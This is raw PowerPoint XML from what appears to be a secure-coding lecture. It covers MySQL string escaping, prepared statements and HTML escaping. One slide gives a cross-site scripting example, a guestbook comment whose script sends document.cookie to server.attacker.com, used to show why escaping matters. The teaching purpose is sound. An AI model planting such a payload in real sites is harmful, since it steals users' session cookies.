              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Z. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pointed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> long. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>*2+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> long. </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26</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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503238" y="692150"/>
            <a:ext cx="8229600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="1412875"/>
            <a:ext cx="8229600" cy="4149725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_real_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	(MYSQL *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stmt_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, unsigned long length) </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="309563" y="2349500"/>
            <a:ext cx="8520112" cy="835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600">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Executes the SQL statement pointed to by stmt_str, which should be a string length bytes long. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_query() cannot be used for statements that contain binary data; you must use mysql_real_query() instead. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Binary data may contain the “\0” character, which mysql_query() interprets as the end of the statement string.) </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1600">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92165" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2051050" y="3284538"/>
            <a:ext cx="4999038" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="3399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sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char query[1000],*end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>end = strmov(query,"INSERT INTO test_table values(");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*end++ = '\'';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>end += mysql_real_escape_string(&amp;mysql, end,"What is this",12);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*end++ = '\'';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*end++ = ',';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*end++ = '\'';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>end += mysql_real_escape_string(&amp;mysql, end,"binary data: \0\r\n",16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*end++ = '\'';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*end++ = ')';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (mysql_real_query(&amp;mysql,query,(unsigned int) (end - query)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   fprintf(stderr, "Failed to insert row, Error: %s\n",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>           mysql_error(&amp;mysql));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRP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27</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Parameterized/prepared statements</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>C# ADO.NET</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="931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349500"/>
            <a:ext cx="7888287" cy="2143125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9318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719" y="5223962"/>
            <a:ext cx="7894638" cy="714375"/>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Obdélník 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4123884" y="6008172"/>
            <a:ext cx="4608954" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More examples at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>://bobby-tables.com/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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>HTML escaping</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>In blogs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>guestbooks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>“Nice website.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>“Nice website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>:)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nice website &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
